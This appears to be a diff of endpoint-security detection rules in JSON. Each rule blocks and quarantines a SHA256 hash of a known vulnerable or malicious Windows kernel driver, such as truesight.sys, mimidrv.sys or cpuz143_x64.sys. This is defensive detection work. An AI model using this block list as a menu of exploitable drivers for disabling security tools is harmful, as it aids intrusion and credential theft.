+ "value": "b205985dc6fb5cc86bc0183295733792f6381cbc4fd71ebadddaa4580efc111b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e696b159-00cc-5604-8380-72a6bee9cff4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480269Z",
+ "creation_date": "2026-03-23T11:45:31.480273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480283Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "64c691ba709918402a9057476a20c115553114cc561a0e747fe9051a3a6e59e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6972193-88d6-5f37-a185-d739c22309dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827838Z",
+ "creation_date": "2026-03-23T11:45:30.827840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b6f84253fa4636d168adb43f17cab909078468c3642370fad468814ee494468",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e69ad721-17ab-5aee-8b0b-6e9f507b9c74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611325Z",
+ "creation_date": "2026-03-23T11:45:29.611327Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "942a7b2ebca0edeff5803c8f899ee455c0ec279542c41d2db2664d58c1025c86",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e69c56b2-6322-56ed-a556-3482426443af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157032Z",
+ "creation_date": "2026-03-23T11:45:31.157034Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157039Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b161aa3620aeb3f956d2fed22b8031e1f822c8f25dd8658988d40b34082d053",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e69f04f4-1ae0-5d12-862c-973a02400602",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158974Z",
+ "creation_date": "2026-03-23T11:45:31.158976Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158982Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19b048d27c93af7f35c406803cadf3f5c11db7a7bbb302a7c3b75814b463c3ff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6a80a26-709c-5a5f-bc2d-47af6e11dd4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815234Z",
+ "creation_date": "2026-03-23T11:45:31.815237Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f23b826fcf9dbb3f30896d08df697232cf627e7893a47a6d57f1fc9f42cb75c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6af817a-bc47-55f0-bdb0-a261c62262e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823701Z",
+ "creation_date": "2026-03-23T11:45:30.823703Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823709Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71e98a83634fde14dc0b117a7aaee15ad5926f3dacf573b53390ff0dedc3e219",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6ca9fb7-73db-5b30-826a-f594e2371182",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973671Z",
+ "creation_date": "2026-03-23T11:45:29.973673Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973678Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5192ec4501d0fe0b1c8f7bf9b778f7524a7a70a26bbbb66e5dab8480f6fdbb8b",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6d9077d-e298-552e-9575-aba16e43de8d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979411Z",
+ "creation_date": "2026-03-23T11:45:29.979413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86047bb1969d1db455493955fd450d18c62a3f36294d0a6c3732c88dfbcc4f62",
+ "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6ddea18-6801-537a-b3cb-b61ddecd9cf7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828583Z",
+ "creation_date": "2026-03-23T11:45:31.828585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "404ca49fd22c7f9b7e575b5dec71a649c043486886f5f8b2349b0486a38c3e53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6e7f4e1-ed2a-5feb-bc40-af648abeaaf0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151281Z",
+ "creation_date": "2026-03-23T11:45:31.151283Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151289Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ecdaef6f3da089597a58aff6ce473394cb9fc3ae32865a08127be953beade95",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6ec4d76-b073-5241-9b05-1bc4ce5402a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818312Z",
+ "creation_date": "2026-03-23T11:45:30.818314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818320Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6297556f66cd6619057f3a5b216b314f8a27eebb5fa575ee07a1944aca71ae80",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6f4d3be-d76d-5abc-afcf-442bf420cc9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481551Z",
+ "creation_date": "2026-03-23T11:45:31.481555Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7c6108816ce5583c38d8f9a98f6e6887eb9c02deb6ec37e1d8c9b09916b12b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6f7c745-c581-51fa-9b5d-02d419cb87d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144446Z",
+ "creation_date": "2026-03-23T11:45:31.144448Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144453Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a562438824f1f074c1eee38e458ca39a2f7452d37e357f3866b1b70b01f4ac26",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e6fe4994-8c6b-569f-901f-4bc1deaeedc3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470430Z",
+ "creation_date": "2026-03-23T11:45:30.470434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26908983e18b807894909d11d6d0fa2d8fbe7544b61184267851c2a839f3b306",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e701b408-1477-59e4-8884-a7f5049a263f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830186Z",
+ "creation_date": "2026-03-23T11:45:31.830188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "063c06d788da475d86bf443fe2d87f474cf614d686ba2add3b5fe6116f532194",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7054bd7-74b6-588d-bd6b-096ed27ddb23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495761Z",
+ "creation_date": "2026-03-23T11:45:31.495763Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da587211d665f55428e281ab6c4ea9164fb8420aa3cb82ff4509c4f10a1d0fef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e70dadb7-51e4-5b76-91f0-3d6b68d1abe9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484815Z",
+ "creation_date": "2026-03-23T11:45:31.484819Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9faef848ca903958f958e420edd216a18621adedfe56fc77d835f8237bcef41",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e710fef6-5112-5732-872a-b3ecff50ec86",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487361Z",
+ "creation_date": "2026-03-23T11:45:31.487363Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487368Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f4daffa9ffe2dacb00343990ee197cb86415519466b5cc3bf8ff33108af51df",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e717fabd-e5de-5109-941b-2e4161f21b07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476862Z",
+ "creation_date": "2026-03-23T11:45:30.476865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476887Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "615c391666b0fdaa0a8096320d35c7b951e6a0ee7f984ab3e892f838cb212b60",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e71e6de8-085c-5f5a-b66b-c5d193e6afed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499296Z",
+ "creation_date": "2026-03-23T11:45:31.499299Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499307Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ca54132ee9953d408688e17facfe8a0bc9bf93e73085c6782ab076a0c3aa2a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e720683c-966c-53fc-a26d-795070b4fef3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822918Z",
+ "creation_date": "2026-03-23T11:45:30.822920Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822925Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e53dabeff15be08a23fb7eccfd82fd1dbdc3de857b28209dac3b4b2bdc3cb13a",
+ "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
